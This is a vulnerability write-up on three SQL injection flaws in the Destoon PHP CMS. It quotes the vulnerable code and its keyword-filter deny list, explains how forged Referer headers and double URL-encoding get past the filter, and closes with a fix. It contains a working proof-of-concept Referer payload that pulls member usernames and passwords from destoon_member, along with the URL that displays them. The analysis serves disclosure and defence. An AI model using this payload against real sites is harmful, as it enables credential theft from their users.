Filtering user input at the request boundary is not enough on its own; the check has to happen where the SQL statement is actually built (ideally by binding parameters, otherwise by escaping at the point of concatenation), because a global "anti-injection" filter always has gaps. The three injections below are all cases where such a gap exists between the filter and the query.
0x00 common.inc.php (Destoon; the table prefix destoon_ and the DT_ constants below identify the product)
    if (!empty($_SERVER['REQUEST_URI'])) strip_uri($_SERVER['REQUEST_URI']); // see 0x01
    if ($_POST) { $_POST = strip_sql($_POST); strip_key($_POST); }
    if ($_GET)  { $_GET  = strip_sql($_GET);  strip_key($_GET); }
    ...
    if ($_POST) extract($_POST, EXTR_SKIP);
    if ($_GET)  extract($_GET,  EXTR_SKIP);
    ...
    $DT_REF = get_env('referer'); // see 0x01
    ...
    $forward = isset($forward) ? urldecode($forward) : $DT_REF; // injection 1, see 0x02
    ...
    $kw = isset($_GET['kw']) ? htmlspecialchars(str_replace(array("\'"), array(''), trim(urldecode($_GET['kw'])))) : ''; // injection 2, see 0x03
    $keyword = $kw ? str_replace(array(' ', '*'), array('%', '%'), $kw) : '';

Injection 1 ($forward): when no `forward` parameter is supplied, the Referer header is used instead. The Referer is entirely attacker-controlled, is not covered by magic_quotes_gpc, and — unlike $_GET/$_POST — is never passed through strip_sql()/strip_key(), so it reaches the INSERT in 0x02 unfiltered.

Injection 2 ($kw): the author evidently meant to strip single quotes, which would be array('\''); written with double quotes, array("\'") removes the two-character sequence backslash-quote instead and leaves a bare ' untouched. Because the value is urldecode()d here, after strip_sql() has already run on $_GET, a double-encoded parameter is decoded back into its dangerous form: %2527 becomes ', and selec%2574 becomes select without ever matching the keyword regex. The only remaining obstacle is strip_uri(), which returns 403 for any REQUEST_URI containing a literal ' (it decodes the URI repeatedly, so double encoding does not help there). The path is therefore only reachable where $_SERVER['REQUEST_URI'] is empty and the !empty() guard skips the check, which the author reports is the case for PHP running as CGI/FastCGI under IIS (see Microsoft KB 954946 and KB 2277918). The final str_replace turns spaces into %, so a payload uses %09 (tab) as its whitespace.

0x01 include/global.func.php

    function strip_uri($uri) {
        if (strpos($uri, '%') !== false) {
            while ($uri != urldecode($uri)) { $uri = urldecode($uri); } // decode until stable, so multiple encoding cannot hide a character
        }
        if (strpos($uri, '<') !== false || strpos($uri, "'") !== false || strpos($uri, '"') !== false || strpos($uri, '0x') !== false) { // a literal ' may not appear anywhere in the URI
            dhttp(403, 0);
            dalert('HTTP 403 Forbidden', DT_PATH);
        }
    }

    // Only $_GET and $_POST are routed through this function; the Referer never is, and the
    // keyword patterns are defeated by double URL-encoding because the value is urldecode()d
    // again afterwards (see 0x00). The body is shown only for completeness.
    function strip_sql($string) {
        $search = array("/union/i", "/0x([a-z0-9]{2,})/i", "/select([[:space:]\*\/\-])/i", "/update([[:space:]\*\/])/i", "/replace([[:space:]\*\/])/i", "/delete([[:space:]\*\/])/i", "/drop([[:space:]\*\/])/i", "/outfile([[:space:]\*\/])/i", "/dumpfile([[:space:]\*\/])/i", "/load_file\(/i", "/substring\(/i", "/substr\(/i", "/concat\(/i", "/concat_ws\(/i", "/ascii\(/i", "/hex\(/i", "/ord\(/i", "/char\(/i");
        $replace = array('unio&#110;', '0&#120;\1', 'selec&#116;\1', 'updat&#101;\1', 'replac&#101;\1', 'delet&#101;\1', 'dro&#112;\1', 'outfil&#101;\1', 'dumpfil&#101;\1', 'load_fil&#101;(', 'substrin&#103;(', 'subst&#114;(', 'conca&#116;(', 'concat_w&#115;(', 'asci&#105;(', 'he&#120;(', 'or&#100;(', 'cha&#114;(');
        // Note that this is a keyword denylist only: it neither escapes nor removes quotes, so
        // anything that slips past the regexes is concatenated into SQL verbatim.
        return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);
    }

    function get_env($type) {
        switch ($type) {
            case 'ip':
                ...
            case 'referer':
                return isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; // raw header, trivially forged
            ...

0x02 module/member/chat.inc.php

    if ($chat) { // the conversation already exists
        if ($chat['touser'] == $_username) {
            if ($DT_TIME - $chat['freadtime'] > $MOD['chat_poll'] * 3) { // the initiator has disconnected
                $db->query("UPDATE {$table} SET fromuser='$chat_fromuser',touser='$chat_touser',tgettime=0 WHERE chatid='$chatid'");
            } else { // initiator online
                dheader('?chatid='.$chatid);
            }
        } else {
            if ($DT_TIME - $chat['treadtime'] > $MOD['chat_poll'] * 3) { // the recipient has disconnected
                $db->query("UPDATE {$table} SET tgettime=0 WHERE chatid='$chatid'");
            } else { // recipient online
            }
        }
    } else {
        $forward = dsafe($forward);
        if (strpos($forward, $MOD['linkurl']) !== false) $forward = '';
        // create a new dialog: $forward (i.e. the forged Referer when no forward parameter was sent)
        // is concatenated straight into the INSERT — injection via forged Referer
        $db->query("INSERT INTO {$table} (chatid,fromuser,touser,tgettime,forward) VALUES ('$chat_id','$chat_fromuser','$chat_touser','0','$forward')");

Proof of concept (reported on Wooyun): start a new conversation with a request that reaches this branch without a `forward` parameter, and send as the Referer header a value that closes the VALUES tuple and appends a second row (dsafe() evidently does not neutralise the bare ' in the affected version, since the PoC depends on it surviving):

    Referer: Wooyun'),(12345678901234567890123456789012,(select concat(username,0x2C,password) from destoon_member limit 1),'test2test',4,'5

The injected row has chatid = 12345678901234567890123456789012, fromuser = the subquery result (username,password of a member), and touser = test2test — the attacker's own account name, which is what lets the row be opened in the next step.
Then, logged in as the member named as touser in the injected row (test2test), open

    http://localhost/de/member/chat.php?chatid=12345678901234567890123456789012

The chatid branch below loads the injected row. Its fromuser is not a valid user name, so it is handled as a guest and the concatenated username,password value is copied into $user['ip'] and fed to ip2area(); the author reports that the returned data is displayed on the page (presumably through the guest IP/region fields rendered by the chat template).
    } else if (isset($chatid) && is_md5($chatid)) { // a 32-character hex-digit value such as the one above passes is_md5()
        $chat = $db->get_one("SELECT * FROM {$table} WHERE chatid='$chatid'");
        if ($chat && $chat['touser'] == $_username) { // only the touser of the row may open it
            $chat_id = $chatid;
            $chat_status = 3;
            if (check_name($chat['fromuser'])) {
                if ($DT_TIME - $chat['freadtime'] > $MOD['chat_poll'] * 3) { // the initiator has disconnected
                    $db->query("UPDATE {$table} SET tgettime=0 WHERE chatid='$chatid'");
                    dheader('chat.php?touser='.$chat['fromuser']);
                }
                $user = userinfo($chat['fromuser']);
                $online = online($user['userid']);
                $user['type'] = 'member';
            } else { // fromuser is not a valid name: treated as a guest identified by IP — this is where the injected value surfaces
                $user = array();
                $user['type'] = 'guest';
                $user['ip'] = $chat['fromuser'];
                $user['region'] = ip2area($chat['fromuser']);
                if ($DT_TIME - $chat['freadtime'] > $MOD['chat_poll'] * 3) { // the initiator is a guest and has disconnected; only the record can be viewed
                    $time = $DT_TIME - $MOD['chat_poll'] * 4;
                    $db->query("UPDATE {$table} SET freadtime='$time' WHERE chatid='$chatid'");
                }
            }
            $head_title = 'and ' . ($user['type'] == 'guest' ? '[Visitor]' : $chat['fromuser']) . ' Dialog'; // i.e. "Dialog with [Visitor]" / "Dialog with <fromuser>"
        } else {
            dheader('chat.php');
        }
        $type = 2;
    }

0x03 api/select.php

    login(); // a valid member session is required to reach this code
    if ($action == 'item') {
        $mid > 3 or dheader(DT_PATH);
        $from = isset($from) ? trim($from) : 'item';
        isset($username) or $username = '';
        $condition = $mid == 4 ? 'groupid>5' : 'status=3';
        if ($keyword) $condition .= " AND keyword LIKE '%$keyword%'";
        // Under the conditions described in 0x00, both a single quote and double-encoded
        // keywords survive the global filter, e.g. select sent as selec%2574 and a space sent as %09.
        if ($from == 'relate' && $mid == 16) {
            check_name($username) or exit;
            $condition .= " AND username='$username'";
        } else {
            if ($_groupid == 1) {
                if ($from == 'member') $condition .= " AND username='$_username'";
            } else {
                $condition .= " AND username='$_username'";
            }
        }
        if ($itemid) $condition .= $mid == 4 ? " AND userid=$itemid" : " AND itemid=$itemid"; // whether $itemid is cast to int before this point is not visible here
        $order = $mid == 4 ? 'userid DESC' : 'addtime DESC';
        $table = get_table($mid);
        $r = $db->get_one("SELECT COUNT(*) AS num FROM {$table} WHERE $condition"); // the tainted $condition reaches the query here
        $items = $r['num'];
        $pages = pages($items, $page, $pagesize);
        $lists = array();
        $result = $db->query("SELECT * FROM {$table} WHERE $condition ORDER BY $order LIMIT $offset,$pagesize"); // and again here

Fix: at all three sinks (the chat INSERT and both SELECTs in api/select.php) build the statement with bound parameters, or at minimum apply the database layer's own escaping at the point of concatenation, instead of trusting the request-level strip_sql()/strip_uri() filter. In addition, $forward should not fall back to the Referer header, and urldecode() should not be applied to values after the input filter has already run, since that reintroduces exactly the characters the filter was meant to remove.